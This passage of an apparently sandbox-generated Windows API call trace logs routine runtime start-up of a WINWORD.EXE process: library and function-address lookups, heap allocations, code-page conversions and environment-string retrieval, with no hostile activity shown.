wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x23, wSecond=0x34, wMilliseconds=0x2cd)) [0111.816] NtdllDefWindowProc_A (hWnd=0x70132, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0113.131] NtdllDefWindowProc_A (hWnd=0x70132, Msg=0xc208, wParam=0x50, lParam=0x0) returned 0x0 [0113.267] NtdllDefWindowProc_A (hWnd=0x70132, Msg=0xc208, wParam=0x50, lParam=0x0) returned 0x0 [0113.953] NtdllDefWindowProc_A (hWnd=0x70132, Msg=0x1c, wParam=0x0, lParam=0x4f0) returned 0x0 [0114.791] GetModuleHandleW (lpModuleName=0x0) returned 0xc80000 [0114.791] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0114.792] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0114.792] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0114.792] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0114.793] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0114.793] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0114.794] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0114.794] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0114.795] GetProcessHeap () returned 0x570000 [0114.795] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0114.796] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0114.796] GetLastError () returned 0x3f0 [0114.796] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0114.796] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x364) returned 0xca475c8 [0114.796] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0114.797] SetLastError (dwErrCode=0x3f0) [0114.797] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xc00) returned 0xca69f90 [0114.799] GetStartupInfoW (in: lpStartupInfo=0x19761c | out: lpStartupInfo=0x19761c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x120996a0, hStdOutput=0xa94fba3e, hStdError=0xfffffffe)) [0114.799] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0114.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0114.799] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.799] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0114.799] GetCommandLineW () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0114.799] GetLastError () returned 0x3f0 [0114.799] SetLastError (dwErrCode=0x3f0) [0114.799] GetLastError () returned 0x3f0 [0114.799] SetLastError (dwErrCode=0x3f0) [0114.799] GetACP () returned 0x4e4 [0114.799] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x220) returned 0xf411960 [0114.799] IsValidCodePage (CodePage=0x4e4) returned 1 [0114.799] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19764c | out: lpCPInfo=0x19764c) returned 1 [0114.799] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x196f14 | out: lpCPInfo=0x196f14) returned 1 [0114.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0114.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196cb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0114.799] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x196f28 | out: lpCharType=0x196f28) returned 1 [0114.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0114.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0114.800] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0114.800] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x769b95f0 [0114.800] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0114.800] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0114.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x197428, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0114.801] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0114.801] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0114.801] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0114.801] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0114.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x197328, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0114.801] RtlInitializeSListHead (in: ListHead=0x120fa0e8 | out: ListHead=0x120fa0e8) [0114.801] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0114.802] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0114.802] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0114.802] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0114.803] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0114.803] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0114.803] GetProcAddress (hModule=0x76720000, lpProcName="InitOnceExecuteOnce") returned 0x769cc2d0 [0114.804] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0114.804] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreW") returned 0x76746710 [0114.805] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0114.805] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0114.805] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0114.806] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0114.806] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0114.807] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0114.807] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0114.808] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0114.809] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0114.809] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0114.809] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0114.810] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0114.810] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0114.810] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0114.811] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleEx") returned 0x76760ea0 [0114.811] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandle") returned 0x76746c30 [0114.811] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x76746cf0 [0114.812] GetProcAddress (hModule=0x76720000, lpProcName="InitializeConditionVariable") returned 0x771f6710 [0114.812] GetProcAddress (hModule=0x76720000, lpProcName="WakeConditionVariable") returned 0x7723c720 [0114.813] GetProcAddress (hModule=0x76720000, lpProcName="WakeAllConditionVariable") returned 0x77238d70 [0114.813] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableCS") returned 0x76a47f60 [0114.813] GetProcAddress (hModule=0x76720000, lpProcName="InitializeSRWLock") returned 0x771f6710 [0114.814] GetProcAddress (hModule=0x76720000, lpProcName="AcquireSRWLockExclusive") returned 0x7721d210 [0114.831] GetProcAddress (hModule=0x76720000, lpProcName="TryAcquireSRWLockExclusive") returned 0x771f3650 [0114.831] GetProcAddress (hModule=0x76720000, lpProcName="ReleaseSRWLockExclusive") returned 0x7721d080 [0114.832] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableSRW") returned 0x76a47fb0 [0114.832] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWork") returned 0x7673ea00 [0114.832] GetProcAddress (hModule=0x76720000, lpProcName="SubmitThreadpoolWork") returned 0x7721ce10 [0114.833] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWork") returned 0x77220550 [0114.833] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0114.834] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0114.834] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0114.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0xb3d2538 [0114.834] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0114.834] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x120fa8f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe")) returned 0x3c [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4c) returned 0xc9b9138 [0114.835] GetEnvironmentStringsW () returned 0xf563e40* [0114.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1556, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1556 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x614) returned 0xc72c4e8 [0114.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1556, lpMultiByteStr=0xc72c4e8, cbMultiByte=1556, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1556 [0114.835] FreeEnvironmentStringsW (penv=0xf563e40) returned 1 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xa0) returned 0xc91bac8 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1f) returned 0xca12398 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0xc9fdb58 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x37) returned 0xc9f5368 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0xca5e090 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0xc9f5668 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0xc6faa78 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0xc7f2660 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0xc9f56e8 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0xc7f2780 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd) returned 0xf610078 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0xca12280 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0xc9f6468 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x15) returned 0xc6fadb8 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0xc6faa38 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe) returned 0xf60feb0 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x69) returned 0xc81c458 [0114.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0xca5e0d8 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1b) returned 0xca12438 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0xca12348 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0xf6034d8 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0xc6fab38 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0xc6fad38 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1b) returned 0xca12370 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0xc7f27b0 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0xc9ff7c8 